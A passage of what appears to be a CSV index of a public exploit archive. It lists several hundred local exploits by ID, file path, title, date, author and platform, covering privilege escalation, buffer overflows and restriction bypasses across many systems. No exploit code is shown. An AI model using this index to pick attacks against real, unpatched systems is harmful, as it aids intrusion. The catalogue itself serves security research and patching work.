Creation",2013-03-25,Dr_IDE,local,windows, +24885,exploits/windows/local/24885.html,"LiquidXML Studio 2010 - ActiveX Code Execution",2013-03-25,Dr_IDE,local,windows, +24899,exploits/hardware/local/24899.txt,"Draytek Vigor 3900 1.06 - Local Privilege Escalation",2013-03-29,"Mohammad abou hayt",local,hardware, +24910,exploits/windows/local/24910.txt,"VirtualDJ Pro/Home 7.3 - Local Buffer Overflow",2013-04-02,"Alexandro Sánchez Bach",local,windows, +24919,exploits/windows/local/24919.py,"HexChat 2.9.4 - Local Overflow",2013-04-07,"Matt Andreko",local,windows, +24923,exploits/multiple/local/24923.txt,"Google AD Sync Tool - Exposure of Sensitive Information",2013-04-08,"Sense of Security",local,multiple, +24929,exploits/linux/local/24929.rb,"HP System Management Homepage - Local Privilege Escalation (Metasploit)",2013-04-08,Metasploit,local,linux, +24933,exploits/linux/local/24933.txt,"PonyOS 0.4.99-mlp - Multiple Vulnerabilities",2013-04-08,"John Cartwright",local,linux, +25039,exploits/aix/local/25039.txt,"IBM AIX 5.x - 'Diag' Local Privilege Escalation",2004-12-20,cees-bart,local,aix, +25040,exploits/php/local/25040.php,"PHP 4.x/5.0 Shared Memory Module - Offset Memory Corruption",2004-12-20,"Stefano Di Paola",local,php, +25055,exploits/osx/local/25055.c,"Darwin Kernel 7.1 - Mach File Parsing Local Integer Overflow",2005-01-19,nemo@felinemenace.org,local,osx, +25080,exploits/linux/local/25080.txt,"Newsgrab 0.5.0pre4 - Multiple Local/Remote Vulnerabilities",2005-02-02,"Niels Heinen",local,linux, +25106,exploits/linux/local/25106.c,"Typespeed 0.4.1 - Local Format String",2005-02-16,"Ulf Harnhammar",local,linux, +25130,exploits/windows/local/25130.py,"FuzeZip 1.0.0.131625 - Local Buffer Overflow (SEH)",2013-05-01,RealPentesting,local,windows, +25131,exploits/windows/local/25131.py,"WinArchiver 3.2 - Local Buffer Overflow (SEH)",2013-05-01,RealPentesting,local,windows, +25134,exploits/linux/local/25134.c,"sudo 1.8.0 < 1.8.3p1 - 'sudo_debug' glibc FORTIFY_SOURCE Bypass + Privilege Escalation",2013-05-01,aeon,local,linux, +25141,exploits/windows/local/25141.rb,"AudioCoder 0.8.18 - Local Buffer Overflow (SEH)",2013-05-02,metacom,local,windows, +25202,exploits/linux/local/25202.c,"Linux Kernel 2.6.x - 'SYS_EPoll_Wait' Integer Overflow / Privilege Escalation (1)",2005-03-09,sd,local,linux, +25204,exploits/windows/local/25204.py,"ABBS Audio Media Player 3.1 - '.lst' Local Buffer Overflow",2013-05-04,"Julien Ahrens",local,windows, +25256,exploits/osx/local/25256.c,"Apple Mac OSX 10.3.x - Multiple Vulnerabilities",2005-03-21,V9,local,osx, +25288,exploits/linux/local/25288.c,"Linux Kernel 2.4.x/2.6.x - BlueTooth Signed Buffer Index Privilege Escalation (1)",2005-04-08,qobaiashi,local,linux, +25289,exploits/linux/local/25289.c,"Linux Kernel 2.4.30/2.6.11.5 - BlueTooth 'bluez_sock_create' Local Privilege Escalation",2005-10-19,backdoored.net,local,linux, +25296,exploits/windows/local/25296.rb,"AudioCoder - '.m3u' Local Buffer Overflow (Metasploit)",2013-05-07,Metasploit,local,windows, +25333,exploits/unix/local/25333.c,"SCO OpenServer 5.0.6/5.0.7 - NWPrint Command Line Argument Local Buffer Overflow",2005-04-04,"pasquale minervini",local,unix, +25361,exploits/irix/local/25361.txt,"SGI IRIX 6.5.22 - GR_OSView Information Disclosure",2005-04-07,anonymous,local,irix, +25362,exploits/irix/local/25362.txt,"SGI IRIX 6.5.22 - GR_OSView Local Arbitrary File Overwrite",2005-04-07,anonymous,local,irix, +25406,exploits/linux/local/25406.sh,"Kloxo 6.1.6 - Local Privilege Escalation",2013-05-13,HTP,local,linux, +25411,exploits/linux/local/25411.py,"No-IP Dynamic Update Client (DUC) 2.1.9 - Local IP Address Stack Overflow",2013-05-13,"Alberto Ortega",local,linux, +25419,exploits/windows/local/25419.pl,"Adrenalin Player 2.2.5.3 - '.m3u' Local Buffer Overflow (SEH)",2013-05-13,seaofglass,local,windows, +25444,exploits/linux/local/25444.c,"Linux Kernel 2.6.32 < 3.x.x (CentOS) - 'PERF_EVENTS' Local Privilege Escalation (1)",2013-05-14,sd,local,linux, +25448,exploits/windows/local/25448.rb,"ERS Viewer 2011 - '.ERS' File Handling Buffer Overflow (Metasploit)",2013-05-14,Metasploit,local,windows, +25450,exploits/linux/local/25450.c,"Linux Kernel < 3.8.x - open-time Capability 'file_ns_capable()' Local Privilege Escalation",2013-05-14,"Andrew Lutomirski",local,linux, +25554,exploits/windows/local/25554.c,"Altiris Client 6.0.88 - Service Privilege Escalation",2005-04-27,"Reed Arvin",local,windows, +40394,exploits/linux/local/40394.rb,"Docker Daemon - Local Privilege Escalation (Metasploit)",2016-09-19,Metasploit,local,linux, +25607,exploits/windows/local/25607.py,"Ophcrack 3.5.0 - Code Execution Local Buffer Overflow",2013-05-21,xis_one,local,windows, +25636,exploits/windows/local/25636.txt,"Positive Software H-Sphere Winbox 2.4 - Sensitive Logfile Content Disclosure",2005-05-09,"Morning Wood",local,windows, +40393,exploits/windows/local/40393.txt,"SolarWinds Kiwi Syslog Server 9.5.1 - Unquoted Service Path Privilege Escalation",2016-09-19,"Halil Dalabasmaz",local,windows, +25688,exploits/linux/local/25688.txt,"Gedit 2.x - Filename Format String",2005-05-30,jsk:exworm,local,linux, +25703,exploits/solaris/local/25703.txt,"Active News Manager - 'login.asp' SQL Injection",2005-05-25,Romty,local,solaris, +25707,exploits/linux/local/25707.txt,"Linux Kernel 2.6.x - Cryptoloop Information Disclosure",2005-05-26,"Markku-Juhani O. Saarinen",local,linux, +25709,exploits/linux/local/25709.sh,"Gentoo Webapp-Config 1.10 - Insecure File Creation",2005-05-26,"Eric Romang",local,linux, +25718,exploits/hardware/local/25718.txt,"Sony Playstation 3 (PS3) 4.31 - Save Game Preview '.SFO' File Handling Local Command Execution",2013-05-26,Vulnerability-Lab,local,hardware, +25725,exploits/windows/local/25725.rb,"AdobeCollabSync - Local Buffer Overflow / Adobe Reader X Sandbox Bypass (Metasploit)",2013-05-26,Metasploit,local,windows, +40392,exploits/linux/local/40392.py,"EKG Gadu 1.9~pre+r2855-3+b1 - Local Buffer Overflow",2016-09-19,"Juan Sacco",local,linux, +25789,exploits/linux/local/25789.c,"FUSE 2.2/2.3 - Local Information Disclosure",2005-06-06,"Miklos Szeredi",local,linux, +40389,exploits/windows/local/40389.php,"PHP 5.0.0 - 'tidy_parse_file()' Local Buffer Overflow",2016-09-19,"Yakir Wizman",local,windows, +25883,exploits/windows/local/25883.txt,"BOINC Manager (Seti@home) 7.0.64 - Field Buffer Overflow (SEH)",2013-06-02,xis_one,local,windows, +25896,exploits/solaris/local/25896.pl,"Sun Solaris 10 Traceroute - Multiple Local Buffer Overflow Vulnerabilities",2005-06-24,"Przemyslaw Frasunek",local,solaris, +25912,exploits/windows/local/25912.c,"Microsoft Windows NT/2000/2003/2008/XP/Vista/7/8 - 'EPATHOBJ' Local Ring",2013-06-03,"Tavis Ormandy",local,windows, +25947,exploits/linux/local/25947.txt,"GNU GNATS 4.0/4.1 - Gen-Index Arbitrary Local File Disclosure/Overwrite",2005-07-06,pi3ki31ny,local,linux, +25961,exploits/windows/local/25961.c,"SoftiaCom wMailServer 1.0 - Local Information Disclosure",2005-07-09,fRoGGz,local,windows, +25993,exploits/linux/local/25993.sh,"Skype Technologies Skype 0.92/1.0/1.1 - Insecure Temporary File Creation",2005-07-18,"Giovanni Delvecchio",local,linux, +26100,exploits/linux/local/26100.sh,"Lantronix Secure Console Server SCS820/SCS1620 - Multiple Local Vulnerabilities",2005-08-05,c0ntex,local,linux, +26131,exploits/lin_x86-64/local/26131.c,"Linux Kernel < 3.8.9 (x86-64) - 'perf_swevent_init' Local Privilege Escalation (2)",2013-06-11,"Andrea Bittau",local,lin_x86-64, +26185,exploits/osx/local/26185.txt,"Apple Mac OSX 10.4 - dsidentity Directory Services Account Creation and Deletion",2005-08-15,"Neil Archibald",local,osx, +26195,exploits/linux/local/26195.txt,"QNX RTOS 6.1/6.3 - InputTrap Local Arbitrary File Disclosure",2005-08-24,"Julio Cesar Fort",local,linux, +26218,exploits/linux/local/26218.txt,"Frox 0.7.18 - Arbitrary Configuration File Access",2005-09-01,rotor,local,linux, +26222,exploits/windows/local/26222.c,"Microsoft Windows XP/2000/2003 - Keyboard Event Privilege Escalation",2005-08-06,"Andres Tarasco",local,windows, +26242,exploits/windows/local/26242.py,"Adrenalin Player 2.2.5.3 - '.wax' Local Buffer Overflow (SEH)",2013-06-17,Onying,local,windows, +26245,exploits/windows/local/26245.py,"Winamp 5.12 - '.m3u' Stack Based Buffer Overflow",2013-06-17,superkojiman,local,windows, +26321,exploits/linux/local/26321.c,"Gnome-PTY-Helper UTMP - Hostname Spoofing",2005-10-03,"Paul Szabo",local,linux, +26323,exploits/windows/local/26323.cpp,"Microsoft Windows XP - Wireless Zero Configuration Service Information Disclosure",2005-10-04,"Laszlo Toth",local,windows, +26352,exploits/php/local/26352.php,"PHP 5.0.5 - Safedir Restriction Bypass",2005-10-17,anonymous,local,php, +26353,exploits/linux/local/26353.txt,"Linux Kernel 2.6 - Console Keymap Local Command Injection (PoC)",2005-10-17,"Rudolf Polzer",local,linux, +26367,exploits/windows/local/26367.py,"Adrenalin Player 2.2.5.3 - '.asx' Local Buffer Overflow (SEH)",2013-06-21,Onying,local,windows, +26368,exploits/freebsd/local/26368.c,"FreeBSD 9.0 < 9.1 - 'mmap/ptrace' Local Privilege Escalation",2013-06-21,Hunger,local,freebsd, +26402,exploits/windows/local/26402.py,"Mediacoder (.lst) - Local Buffer Overflow (SEH)",2013-06-24,metacom,local,windows, +26403,exploits/windows/local/26403.py,"Mediacoder - '.m3u' Local Buffer Overflow (SEH)",2013-06-24,metacom,local,windows, +26404,exploits/windows/local/26404.py,"Mediacoder PMP Edition 0.8.17 - '.m3u' Local Buffer Overflow",2013-06-24,metacom,local,windows, +26409,exploits/windows/local/26409.py,"aSc Timetables 2013 - Local Stack Buffer Overflow",2013-06-24,Dark-Puzzle,local,windows, +26411,exploits/windows/local/26411.py,"AudioCoder 0.8.22 - '.m3u' Direct RETN Buffer Overflow",2013-06-24,Onying,local,windows, +26418,exploits/windows/local/26418.rb,"Novell Client 4.91 SP4 - 'nwfs.sys' Local Privilege Escalation (Metasploit)",2013-06-24,Metasploit,local,windows, +26448,exploits/windows/local/26448.py,"AudioCoder 0.8.22 - '.lst' Direct RETN Buffer Overflow",2013-06-26,Onying,local,windows, +26451,exploits/linux/local/26451.rb,"ZPanel zsudo - Local Privilege Escalation (Metasploit)",2013-06-26,Metasploit,local,linux, +26452,exploits/win_x86/local/26452.rb,"Novell Client 2 SP3 - 'nicm.sys' Local Privilege Escalation (Metasploit)",2013-06-26,Metasploit,local,win_x86, +26454,exploits/freebsd/local/26454.rb,"FreeBSD 9 - Address Space Manipulation Privilege Escalation (Metasploit)",2013-06-26,Metasploit,local,freebsd, +26479,exploits/windows/local/26479.txt,"Zone Labs Zone Alarm 6.0 - Advance Program Control Bypass",2005-11-07,Tr0y-x,local,windows, +26492,exploits/linux/local/26492.txt,"Emacs 2.1 - Local Variable Arbitrary Command Execution",2002-12-31,"Georgi Guninski",local,linux, +26498,exploits/linux/local/26498.txt,"Sudo Perl 1.6.x - Environment Variable Handling Security Bypass",2005-11-11,"Charles Morris",local,linux, +26520,exploits/windows/local/26520.py,"Static HTTP Server 1.0 - Local Overflow (SEH)",2013-07-01,"Jacob Holcomb",local,windows, +26523,exploits/windows/local/26523.rb,"AudioCoder (.lst) - Local Buffer Overflow (Metasploit)",2013-07-01,Asesino04,local,windows, +26525,exploits/windows/local/26525.py,"Adrenalin Player 2.2.5.3 - '.wvx' Local Buffer Overflow (SEH)",2013-07-01,MrXors,local,windows, +26554,exploits/windows/local/26554.rb,"Microsoft Windows - 'EPATHOBJ::pprFlattenRec' Local Privilege Escalation (Metasploit)",2013-07-02,Metasploit,local,windows, +28085,exploits/windows/local/28085.html,"KingView 6.53 - 'KChartXY' ActiveX Remote File Creation / Overwrite",2013-09-04,blake,local,windows, +26579,exploits/windows/local/26579.rb,"ABBS Audio Media Player - '.LST' Local Buffer Overflow (Metasploit)",2013-07-03,Metasploit,local,windows, +26703,exploits/windows/local/26703.py,"Adobe Reader X 10.1.4.38 - '.BMP'/'.RLE' Heap Corruption",2013-07-08,feliam,local,windows, +26708,exploits/windows/local/26708.rb,"ERS Viewer 2013 - '.ERS' File Handling Buffer Overflow (Metasploit)",2013-07-09,Metasploit,local,windows, +26709,exploits/lin_x86/local/26709.txt,"Solaris Recommended Patch Cluster 6/19 (x86) - Local Privilege Escalation",2013-07-09,"Larry W. Cashdollar",local,lin_x86, +26752,exploits/windows/local/26752.s,"Multiple Vendor BIOS - Keyboard Buffer Password Persistence Weakness (1)",2005-12-06,Endrazine,local,windows, +26753,exploits/unix/local/26753.c,"Multiple Vendor BIOS - Keyboard Buffer Password Persistence Weakness (2)",2005-12-06,Endrazine,local,unix, +26805,exploits/windows/local/26805.rb,"Corel PDF Fusion - Local Stack Buffer Overflow (Metasploit)",2013-07-13,Metasploit,local,windows, +26889,exploits/windows/local/26889.pl,"BlazeDVD Pro Player 6.1 - Stack Based Direct RET Buffer Overflow",2013-07-16,PuN1sh3r,local,windows, +40385,exploits/netbsd_x86/local/40385.rb,"NetBSD - 'mail.local(8)' Local Privilege Escalation (Metasploit)",2016-09-15,Metasploit,local,netbsd_x86, +26950,exploits/windows/local/26950.c,"Symantec Workspace Virtualization 6.4.1895.0 - Kernel Mode Privilege Escalation",2013-07-18,MJ0011,local,windows, +26970,exploits/windows/local/26970.c,"McAfee VirusScan 8.0 - Path Specification Privilege Escalation",2005-12-22,"Reed Arvin",local,windows, +26996,exploits/aix/local/26996.txt,"IBM AIX 5.3 - 'GetShell' / 'GetCommand' File Enumeration",2005-12-30,xfocus,local,aix, +26997,exploits/aix/local/26997.txt,"IBM AIX 5.3 - 'GetShell' / 'GetCommand' File Disclosure",2006-01-01,xfocus,local,aix, +27041,exploits/windows/local/27041.pl,"Super Player 3500 - '.m3u' Local Stack Based Buffer Overflow",2013-07-23,jun,local,windows, +27056,exploits/linux/local/27056.pl,"Sudo 1.6.x - Environment Variable Handling Security Bypass (1)",2006-01-09,"Breno Silva Pinto",local,linux, +27057,exploits/linux/local/27057.py,"Sudo 1.6.x - Environment Variable Handling Security Bypass (2)",2006-01-09,"Breno Silva Pinto",local,linux, +27065,exploits/linux/local/27065.txt,"Cray UNICOS /usr/bin/script - Command Line Argument Local Overflow",2006-01-10,"Micheal Turner",local,linux, +27066,exploits/linux/local/27066.txt,"Cray UNICOS /etc/nu - '-c' Option Filename Processing Local Overflow",2006-01-10,"Micheal Turner",local,linux, +27168,exploits/qnx/local/27168.txt,"QNX 6.2/6.3 - Multiple Privilege Escalation / Denial of Service Vulnerabilities",2006-02-07,anonymous,local,qnx, +27191,exploits/windows/local/27191.py,"Novell Client 2 SP3 - 'nicm.sys 3.1.11.0' Local Privilege Escalation",2013-07-29,sickness,local,windows, +27231,exploits/linux/local/27231.txt,"GnuPG 1.x - Detached Signature Verification Bypass",2006-02-15,taviso,local,linux, +27282,exploits/windows/local/27282.txt,"Agnitum Outpost Security Suite 8.1 - Local Privilege Escalation",2013-08-02,"Ahmad Moghimi",local,windows, +27285,exploits/hardware/local/27285.txt,"Karotz Smart Rabbit 12.07.19.00 - Multiple Vulnerabilities",2013-08-02,"Trustwave's SpiderLabs",local,hardware, +27296,exploits/windows/local/27296.rb,"Microsoft Windows - HWND_BROADCAST Low to Medium Integrity Privilege Escalation (MS13-005) (Metasploit)",2013-08-02,Metasploit,local,windows, +27297,exploits/linux/local/27297.c,"Linux Kernel 3.7.6 (RedHat x86/x64) - 'MSR' Driver Privilege Escalation",2013-08-02,spender,local,linux, +27316,exploits/windows/local/27316.py,"Easy LAN Folder Share 3.2.0.100 - Local Buffer Overflow (SEH)",2013-08-03,sagi-,local,windows, +27334,exploits/php/local/27334.txt,"PHP 4.x/5.0/5.1 with Sendmail Mail Function - 'additional_param' Arbitrary File Creation",2006-02-28,ced.clerget@free.fr,local,php, +27335,exploits/php/local/27335.txt,"PHP 4.x/5.0/5.1 - 'mb_send_mail()' Restriction Bypass",2006-02-28,ced.clerget@free.fr,local,php, +40764,exploits/windows/local/40764.cs,"Microsoft Windows - VHDMP ZwDeleteFile Arbitrary File Deletion Privilege Escalation (MS16-138)",2016-11-15,"Google Security Research",local,windows, +40763,exploits/windows/local/40763.cs,"Microsoft Windows - VHDMP Arbitrary File Creation Privilege Escalation (MS16-138)",2016-11-15,"Google Security Research",local,windows, +27461,exploits/linux/local/27461.c,"Linux Kernel 2.4.x/2.5.x/2.6.x - 'Sockaddr_In.Sin_Zero' Kernel Memory Disclosure",2006-03-23,"Pavel Kankovsky",local,linux, +27609,exploits/windows/local/27609.rb,"Chasys Draw IES - Local Buffer Overflow (Metasploit)",2013-08-15,Metasploit,local,windows, +27766,exploits/linux/local/27766.txt,"Linux Kernel 2.6.x - SMBFS CHRoot Security Restriction Bypass",2006-04-28,"Marcel Holtmann",local,linux, +27769,exploits/linux/local/27769.txt,"Linux Kernel 2.6.x - CIFS CHRoot Security Restriction Bypass",2006-04-28,"Marcel Holtmann",local,linux, +27874,exploits/windows/local/27874.py,"Winamp 5.63 - 'winamp.ini' Local Overflow",2013-08-26,"Ayman Sagy",local,windows, +27938,exploits/linux/local/27938.rb,"VMware - Setuid VMware-mount Unsafe popen(3) (Metasploit)",2013-08-29,Metasploit,local,linux, +27944,exploits/osx/local/27944.rb,"Apple Mac OSX - Sudo Password Bypass (Metasploit)",2013-08-29,Metasploit,local,osx, +27965,exploits/osx/local/27965.py,"Apple Mac OSX 10.8.4 - Local Privilege Escalation (Python)",2013-08-30,"David Kennedy (ReL1K)",local,osx, +28084,exploits/windows/local/28084.html,"KingView 6.53 - 'SuperGrid' Insecure ActiveX Control",2013-09-04,blake,local,windows, +28130,exploits/windows/local/28130.rb,"IKE and AuthIP IPsec Keyring Modules Service (IKEEXT) - Missing DLL (Metasploit)",2013-09-06,Metasploit,local,windows, +28287,exploits/linux/local/28287.c,"Linux-HA Heartbeat 1.2.3/2.0.x - Insecure Default Permissions on Shared Memory",2006-07-27,anonymous,local,linux, +28288,exploits/linux/local/28288.c,"MidiRecord2 MidiRecord.CC - Local Buffer Overflow",2006-07-27,"Dedi Dwianto",local,linux, +28332,exploits/linux/local/28332.rb,"Sophos Web Protection Appliance - clear_keys.pl Privilege Escalation (Metasploit)",2013-09-17,Metasploit,local,linux, +28335,exploits/windows/local/28335.rb,"Agnitum Outpost Internet Security - Local Privilege Escalation (Metasploit)",2013-09-17,Metasploit,local,windows, +28405,exploits/linux/local/28405.txt,"Roxio Toast 7 - DejaVu Component PATH Variable Privilege Escalation",2006-08-18,Netragard,local,linux, +28425,exploits/solaris/local/28425.txt,"Sun Solaris 8/9 UCB/PS - Command Local Information Disclosure",2006-03-27,anonymous,local,solaris, +28427,exploits/novell/local/28427.pl,"Novell Identity Manager - Arbitrary Command Execution",2006-08-18,anonymous,local,novell, +28504,exploits/php/local/28504.php,"PHP 3 < 5 - Ini_Restore() 'Safe_mode' / 'open_basedir' Restriction Bypass",2006-09-09,"Maksymilian Arciemowicz",local,php, +28507,exploits/aix/local/28507.sh,"IBM AIX 6.1/7.1 - Local Privilege Escalation",2013-09-24,"Kristian Erik Hermansen",local,aix, +28576,exploits/osx/local/28576.txt,"Apple Mac OSX 10.x - KExtLoad Format String",2006-09-14,"Adriel T. Desautels",local,osx, +40376,exploits/windows/local/40376.txt,"Multiple Icecream Apps - Insecure File Permissions Privilege Escalation",2016-09-13,Tulpa,local,windows, +28655,exploits/multiple/local/28655.rb,"Nodejs - 'js-yaml load()' Code Exec (Metasploit)",2013-09-30,Metasploit,local,multiple, +28657,exploits/linux/local/28657.c,"glibc and eglibc 2.5/2.7/2.13 - Local Buffer Overflow",2013-09-30,"Hector Marco & Ismael Ripoll",local,linux, +40375,exploits/windows/local/40375.txt,"WinSMS 3.43 - Insecure File Permissions Privilege Escalation",2016-09-13,Tulpa,local,windows, +28680,exploits/linux/local/28680.txt,"PinApp Mail-SeCure 3.70 - Access Control Failure",2013-10-02,"Core Security",local,linux, +28718,exploits/freebsd/local/28718.c,"FreeBSD 9.0 - Intel SYSRET Kernel Privilege Escalation",2013-10-04,CurcolHekerLink,local,freebsd, +28763,exploits/windows/local/28763.c,"Symantec AntiVirus - IOCTL Kernel Privilege Escalation (1)",2006-08-26,"Ruben Santamarta",local,windows, +28764,exploits/windows/local/28764.c,"Symantec AntiVirus - IOCTL Kernel Privilege Escalation (2)",2006-08-26,"Ruben Santamarta",local,windows, +28788,exploits/solaris/local/28788.sh,"Sun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation (1)",2006-10-13,"Marco Ivaldi",local,solaris, +28789,exploits/solaris/local/28789.sh,"Sun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation (2)",2006-10-24,"Marco Ivaldi",local,solaris, +29213,exploits/windows/local/29213.pl,"Photodex ProShow Producer 5.0.3310 - Local Buffer Overflow (SEH)",2013-10-26,"Mike Czumak",local,windows, +28806,exploits/linux/local/28806.txt,"davfs2 1.4.6/1.4.7 - Local Privilege Escalation",2013-10-08,"Lorenzo Cantoni",local,linux, +28817,exploits/multiple/local/28817.txt,"Internet Security Systems 3.6 - 'ZWDeleteFile()' Arbitrary File Deletion",2006-10-16,"Matousec Transparent security",local,multiple, +28955,exploits/windows/local/28955.py,"Internet Haut Debit Mobile PCW_MATMARV1.0.0B03 - Local Buffer Overflow (SEH)",2013-10-14,metacom,local,windows, +28969,exploits/windows/local/28969.py,"Beetel Connection Manager PCW_BTLINDV1.0.0B04 - Local Buffer Overflow (SEH)",2013-10-15,metacom,local,windows, +28984,exploits/hp-ux/local/28984.pl,"HP Tru64 4.0/5.1 - POSIX Threads Library Privilege Escalation",2006-11-13,"Adriel T. Desautels",local,hp-ux, +40768,exploits/linux/local/40768.sh,"Nginx (Debian Based Distros + Gentoo) - 'logrotate' Local Privilege Escalation",2016-11-16,"Dawid Golunski",local,linux, +29069,exploits/windows/local/29069.c,"Computer Associates Personal Firewall 9.0 - HIPS Driver 'kmxfw.sys' Local Privilege Escalation",2006-11-16,"Ruben Santamarta",local,windows, +29070,exploits/windows/local/29070.c,"Computer Associates Personal Firewall 9.0 - HIPS Driver 'kmxstart.sys' Local Privilege Escalation",2006-11-16,"Ruben Santamarta",local,windows, +29102,exploits/openbsd/local/29102.c,"OpenBSD 3.9/4.0 - 'ld.so' Local Environment Variable Clearing",2006-11-20,"Mark Dowd",local,openbsd, +29125,exploits/windows/local/29125.txt,"Avira Internet Security - 'avipbb.sys' Filter Bypass / Privilege Escalation",2013-10-22,"Ahmad Moghimi",local,windows, +34371,exploits/windows/local/34371.py,"BlazeDVD Pro Player 7.0 - '.plf' Local Buffer Overflow (SEH)",2014-08-20,metacom,local,windows, +29190,exploits/osx/local/29190.txt,"Apple Mac OSX 10.4.x - Mach-O Binary Loading Integer Overflow",2006-11-26,LMH,local,osx, +29194,exploits/osx/local/29194.c,"Apple Mac OSX 10.4.x - AppleTalk AIOCRegLocalZN IOCTL Stack Buffer Overflow",2006-11-27,LMH,local,osx, +29201,exploits/osx/local/29201.c,"Apple Mac OSX 10.4.x - 'Shared_Region_Make_Private_Np' Kernel Function Local Memory Corruption",2006-11-29,LMH,local,osx, +29234,exploits/windows/local/29234.py,"VideoCharge Studio 2.12.3.685 - Local Buffer Overflow (SEH)",2013-10-27,metacom,local,windows, +29239,exploits/php/local/29239.txt,"PHP 5.2 - Session.Save_Path() 'Safe_mode' / 'open_basedir' Restriction Bypass",2006-12-08,"Maksymilian Arciemowicz",local,php, +29327,exploits/windows/local/29327.py,"Watermark Master 2.2.23 - Local Buffer Overflow (SEH)",2013-11-01,metacom,local,windows, +29263,exploits/windows/local/29263.pl,"BlazeDVD 6.2 - '.plf' Local Buffer Overflow (SEH)",2013-10-28,"Mike Czumak",local,windows, +29309,exploits/windows/local/29309.pl,"AudioCoder 0.8.22 - '.m3u' Local Buffer Overflow (SEH)",2013-10-30,"Mike Czumak",local,windows, +29374,exploits/windows/local/29374.txt,"Kerio Personal Firewall 4.3 - 'IPHLPAPI.dll' Local Privilege Escalation",2007-01-01,"Matousec Transparent security",local,windows, +29403,exploits/windows/local/29403.txt,"HP (Multiple Products) - PML Driver HPZ12 Privilege Escalation",2007-01-08,Sowhat,local,windows, +29446,exploits/linux/local/29446.c,"Grsecurity Kernel PaX - Local Privilege Escalation",2006-12-18,anonymous,local,linux, +29465,exploits/windows/local/29465.txt,"Outpost Firewall PRO 4.0 - Local Privilege Escalation",2007-01-15,"Matousec Transparent security",local,windows, +29467,exploits/linux/local/29467.c,"Rixstep Undercover - Local Privilege Escalation",2007-01-15,"Rixstep Pwned",local,linux, +30032,exploits/windows/local/30032.rb,"Steinberg MyMp3PRO 5.0 - Local Buffer Overflow (SEH) (DEP Bypass + ROP)",2013-12-04,metacom,local,windows, +30039,exploits/multiple/local/30039.txt,"Multiple Personal Firewall Products - Local Protection Mechanism Bypass",2007-05-15,"Matousec Transparent security",local,multiple, +30017,exploits/unix/local/30017.sh,"HP Tru64 5.0.1 - DOP Command Privilege Escalation",2007-05-08,"Daniele Calore",local,unix, +30021,exploits/solaris/local/30021.txt,"Sun Microsystems Solaris SRSEXEC 3.2.x - Arbitrary File Read Local Information Disclosure",2007-05-10,anonymous,local,solaris, +30014,exploits/windows/local/30014.py,"Microsoft Windows - 'NDPROXY' SYSTEM Privilege Escalation (MS14-002)",2013-12-03,ryujin,local,windows, +29547,exploits/windows/local/29547.rb,"VideoSpirit Pro 1.90 - Local Buffer Overflow (SEH)",2013-11-12,metacom,local,windows, +29528,exploits/php/local/29528.txt,"PHP 5.2 - FOpen 'Safe_mode' Restriction Bypass",2007-01-26,"Maksymilian Arciemowicz",local,php, +29548,exploits/windows/local/29548.rb,"VideoSpirit Lite 1.77 - Local Buffer Overflow (SEH)",2013-11-12,metacom,local,windows, +29549,exploits/windows/local/29549.pl,"ALLPlayer 5.6.2 - '.m3u' File Local Buffer Overflow (SEH Unicode)",2013-11-12,"Mike Czumak",local,windows, +29594,exploits/windows/local/29594.txt,"Watermark Master 2.2.23 - '.wstyle' Local Buffer Overflow (SEH)",2013-11-14,"Mike Czumak",local,windows, +29603,exploits/windows/local/29603.txt,"Comodo Firewall 2.3/2.4 - Flawed Component Control Cryptographic Hash",2007-02-15,"Matousec Transparent security",local,windows, +29630,exploits/windows/local/29630.c,"Microsoft Windows XP/2003 - ReadDirectoryChangesW Information Disclosure",2007-02-22,3APA3A,local,windows, +30192,exploits/windows/local/30192.txt,"Kaspersky Internet Security 6.0 - SSDT Hooks Multiple Local Vulnerabilities",2007-06-15,"Matousec Transparent security",local,windows, +29695,exploits/windows/local/29695.txt,"Comodo Firewall Pro 2.4.x - Local Protection Mechanism Bypass",2007-03-01,"Matousec Transparent security",local,windows, +29712,exploits/php/local/29712.txt,"Zend Platform 2.2.1 - 'PHP.INI' File Modification",2007-03-03,"Stefan Esser",local,php, +29714,exploits/linux/local/29714.txt,"Linux Kernel 2.6.17 - 'Sys_Tee' Local Privilege Escalation",2007-03-05,"Michael Kerrisk",local,linux, +29798,exploits/windows/local/29798.pl,"ALLPlayer 5.7 - '.m3u' UNICODE Buffer Overflow (SEH)",2013-11-24,"Mike Czumak",local,windows, +29746,exploits/linux/local/29746.txt,"Horde Framework and IMP 2.x/3.x - Cleanup Cron Script Arbitrary File Deletion",2007-03-15,anonymous,local,linux, +29777,exploits/windows/local/29777.pl,"Light Alloy 4.7.3 - '.m3u' Local Buffer Overflow (SEH Unicode)",2013-11-22,"Mike Czumak",local,windows, +30783,exploits/windows/local/30783.py,"CCProxy 7.3 - Integer Overflow",2014-01-07,Mr.XHat,local,windows, +30154,exploits/windows/local/30154.pl,"GOM Player 2.2.53.5169 - '.reg' Local Buffer Overflow (SEH)",2013-12-09,"Mike Czumak",local,windows, +30183,exploits/multiple/local/30183.txt,"Air Gallery 1.0 Air Photo Browser - Multiple Vulnerabilities",2013-12-10,Vulnerability-Lab,local,multiple, +29799,exploits/windows/local/29799.pl,"Total Video Player 1.3.1 - 'Settings.ini' Local Buffer Overflow (SEH)",2013-11-24,"Mike Czumak",local,windows, +29801,exploits/php/local/29801.php,"PHP 5.2.1 - 'Session.Save_Path()' TMPDIR open_basedir Restriction Bypass",2007-03-28,"Stefan Esser",local,php, +29804,exploits/php/local/29804.php,"PHP 5.2.1 - Multiple functions 'Reference' Information Disclosures",2007-03-29,"Stefan Esser",local,php, +29822,exploits/linux/local/29822.c,"Man Command - -H Flag Local Buffer Overflow",2007-04-06,"Daniel Roethlisberger",local,linux, +29881,exploits/windows/local/29881.txt,"Adobe Acrobat Reader - ASLR + DEP Bypass with Sandbox Bypass",2013-11-28,"w3bd3vil & abh1sek",local,windows, +29922,exploits/windows/local/29922.py,"Kingsoft Office Writer 2012 8.1.0.3385 - '.wps' Local Buffer Overflow (SEH)",2013-11-30,"Julien Ahrens",local,windows, +29950,exploits/osx/local/29950.js,"Apple 2.0.4 - Safari Local Cross-Site Scripting",2007-05-04,poplix,local,osx, +29954,exploits/linux/local/29954.txt,"ELinks Relative 0.10.6/011.1 - Path Arbitrary Code Execution",2007-05-07,"Arnaud Giersch",local,linux, +30007,exploits/windows/local/30007.txt,"Notepad++ Plugin Notepad 1.5 - Local Overflow",2013-12-03,"Junwen Sun",local,windows, +30096,exploits/osx/local/30096.txt,"Apple Mac OSX 10.4.9 - VPND Local Format String",2007-05-29,"Chris Anley",local,osx, 